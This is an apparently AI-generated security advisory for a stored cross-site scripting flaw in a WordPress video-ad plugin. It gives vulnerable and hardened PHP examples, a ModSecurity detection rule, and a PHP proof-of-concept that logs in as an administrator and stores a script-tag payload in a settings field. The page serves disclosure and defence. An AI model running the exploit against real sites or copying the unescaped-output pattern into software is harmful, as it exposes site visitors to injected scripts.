Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 25, 2026

CVE-2026-2424: Reward Video Ad for WordPress <= 1.6 – Authenticated (Administrator+) Stored Cross-Site Scripting via Admin Settings (applixir)

CVE ID CVE-2026-2424
Plugin applixir
Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version 1.6
Patched Version
Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2424 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Reward Video Ad for WordPress plugin (applixir) up to version 1.6. The vulnerability resides in the plugin’s admin settings interface, allowing attackers with administrator privileges to inject malicious scripts that persist and execute for other users.

Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping on several plugin settings fields, including ‘Account ID’, ‘Message before the video’, and color fields. This CWE-79 pattern is common in WordPress plugins where user input from admin forms is saved to the database without proper sanitization using functions like `sanitize_text_field`, then later output without escaping via functions like `esc_attr` or `esc_html`. The vulnerability description confirms the lack of sanitization and escaping, but the exact code location is inferred from the CWE classification and typical WordPress admin settings patterns.

Exploitation requires an attacker to have administrator-level access to the WordPress dashboard. The attacker would navigate to the plugin's settings page, likely under a menu such as 'Reward Video Ad' within the WordPress admin panel. They would then submit a malicious payload into one of the vulnerable fields, such as the 'Message before the video' textarea. A typical test payload would be `<script>alert(document.domain)</script>`. Upon saving the settings, this script is stored in the WordPress database. The script executes in the browser of any user who later views a page where the plugin renders this unsanitized setting, such as a frontend page containing the video ad unit.

Remediation requires implementing proper input validation and output escaping. The plugin developers should sanitize all user input on the server side before saving it to the database, using WordPress core functions such as `sanitize_text_field` for text inputs and `sanitize_hex_color` for color fields. Additionally, all output of these settings must be escaped for the context it is rendered in, using `esc_html` for text content and `esc_attr` for HTML attribute values. A nonce check should also be present on the settings form submission to prevent CSRF attacks, though the CVE description does not mention its absence.
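The sanitize-on-save, escape-on-output pattern described above, shown as an added example that is not the plugin's own code: a vulnerable save/render pair beside its hardened form. The option, field and nonce names (applixir_message_before, applixir_color_primary, applixir_settings_nonce) are assumptions, not identifiers confirmed from the plugin source.

```php
<?php
// Added example (not the plugin's own code): vulnerable save/render pattern
// beside its hardened form. Option, field and nonce names are assumptions.

// --- Vulnerable pattern: raw POST data stored, raw option echoed into HTML ---
function applixir_save_settings_vulnerable() {
    update_option( 'applixir_message_before', $_POST['applixir_message_before'] );
    update_option( 'applixir_color_primary',  $_POST['applixir_color_primary'] );
}
function applixir_render_vulnerable() {
    // Both values land in HTML unescaped, so a stored <script> tag runs for every visitor.
    echo '<div style="color:' . get_option( 'applixir_color_primary' ) . '">'
       . get_option( 'applixir_message_before' ) . '</div>';
}

// --- Hardened pattern: capability + nonce check, sanitize on save, escape on output ---
function applixir_settings_form_hardened() {
    echo '<form method="post">';
    wp_nonce_field( 'applixir_save_settings', 'applixir_settings_nonce' ); // nonce the save handler checks
    echo '<textarea name="applixir_message_before">'
       . esc_textarea( get_option( 'applixir_message_before', '' ) ) . '</textarea>';
    echo '<input type="text" name="applixir_color_primary" value="'
       . esc_attr( get_option( 'applixir_color_primary', '#ffffff' ) ) . '">';
    echo '<button name="action" value="save">Save</button></form>';
}
function applixir_save_settings_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // Dies on a missing or forged nonce, which blocks cross-site (CSRF) submissions.
    check_admin_referer( 'applixir_save_settings', 'applixir_settings_nonce' );

    $message = isset( $_POST['applixir_message_before'] )
        ? sanitize_text_field( wp_unslash( $_POST['applixir_message_before'] ) ) : '';
    // sanitize_hex_color() returns null for anything that is not #rgb / #rrggbb.
    $color = isset( $_POST['applixir_color_primary'] )
        ? sanitize_hex_color( wp_unslash( $_POST['applixir_color_primary'] ) ) : null;

    update_option( 'applixir_message_before', $message );
    update_option( 'applixir_color_primary', $color ? $color : '#ffffff' );
}
function applixir_render_hardened() {
    // Escape for the context each value lands in: attribute value vs. element text.
    echo '<div style="color:' . esc_attr( get_option( 'applixir_color_primary', '#ffffff' ) ) . '">'
       . esc_html( get_option( 'applixir_message_before', '' ) ) . '</div>';
}
```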

The impact of this vulnerability is limited to stored XSS attacks. A successful exploit allows an attacker with administrator privileges to inject arbitrary JavaScript that executes in the context of any user viewing the affected page. This can lead to session hijacking, defacement, or malicious redirects for users, including other administrators. The CVSS score of 4.4 is driven mainly by the required administrator privilege (PR:H) and the stated high attack complexity (AC:H); the UI:N component means the victim needs to do nothing beyond loading the poisoned page.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-2424 (metadata-based)
# The 'page', 'action' and 'applixir_message_before' names are assumed from typical
# admin-settings handlers, not confirmed from plugin source; adjust to the real form.
# REQUEST_FILENAME is matched instead of REQUEST_URI because REQUEST_URI carries the
# query string (?page=applixir), which would defeat an exact path comparison.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin.php" \
  "id:20262424,phase:2,deny,status:403,chain,msg:'CVE-2026-2424 via applixir plugin admin settings',severity:'CRITICAL',tag:'CVE-2026-2424',tag:'WordPress',tag:'applixir',tag:'XSS'"
  SecRule ARGS_GET:page "@streq applixir" "chain"
    SecRule ARGS_POST:action "@streq save" "chain"
      SecRule ARGS_POST:applixir_message_before "@rx <script[^>]*>" \
        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2424 - Reward Video Ad for WordPress <= 1.6 - Authenticated (Administrator+) Stored Cross-Site Scripting via Admin Settings
// (the opening <?php tag sits before the comment block so that the comments are not emitted as output)

$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=applixir'; // Assumed admin settings page
$username = 'admin'; // Administrator username
$password = 'password'; // Administrator password
$payload = '<script>alert("Atomic Edge XSS Test: "+document.domain)</script>';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, str_replace('wp-admin/admin.php', 'wp-login.php', $target_url));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Look for a login nonce if one is present. The stock wp-login.php form has no
// _wpnonce field (the 'log' field is the username), so this normally stays empty.
$login_page = curl_exec($ch);
preg_match('/name="_wpnonce" value="([^"]+)"/', $login_page, $matches);
$login_nonce = $matches[1] ?? '';

// Perform login
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1',
    '_wpnonce' => $login_nonce
];
curl_setopt($ch, CURLOPT_URL, str_replace('wp-admin/admin.php', 'wp-login.php', $target_url));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Check whether login succeeded by fetching the admin page. CURLOPT_HTTPGET switches
// the reused handle back to GET; setting CURLOPT_POST to false does not reliably do so.
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$admin_page = curl_exec($ch);

// Extract the settings form nonce (assumed field name 'applixir_settings_nonce')
preg_match('/name="applixir_settings_nonce" value="([^"]+)"/', $admin_page, $matches);
$settings_nonce = $matches[1] ?? '';

if (empty($settings_nonce)) {
    die('Could not find settings nonce. Plugin admin page structure may differ.');
}

// Submit the XSS payload to the settings form
// Assumes the form submits via POST to admin.php?page=applixir with an 'action' parameter of 'save'
$exploit_fields = [
    'action' => 'save',
    'applixir_settings_nonce' => $settings_nonce,
    'applixir_account_id' => 'test_account', // Legitimate value
    'applixir_message_before' => $payload, // Injected into vulnerable field
    'applixir_color_primary' => '#ffffff' // Legitimate value
];
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
$exploit_response = curl_exec($ch);

// Verify the payload was stored by fetching the frontend page where the plugin renders
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-site.com/');
curl_setopt($ch, CURLOPT_HTTPGET, true); // back to GET for the reused handle
$frontend_page = curl_exec($ch);

if (strpos($frontend_page, $payload) !== false) {
    echo "SUCCESS: XSS payload likely stored. Check frontend page source for: " . htmlspecialchars($payload) . "\n";
} else {
    echo "Payload may not have been stored or plugin renders on different pages.\n";
}

curl_close($ch);
unlink('cookies.txt');

?>
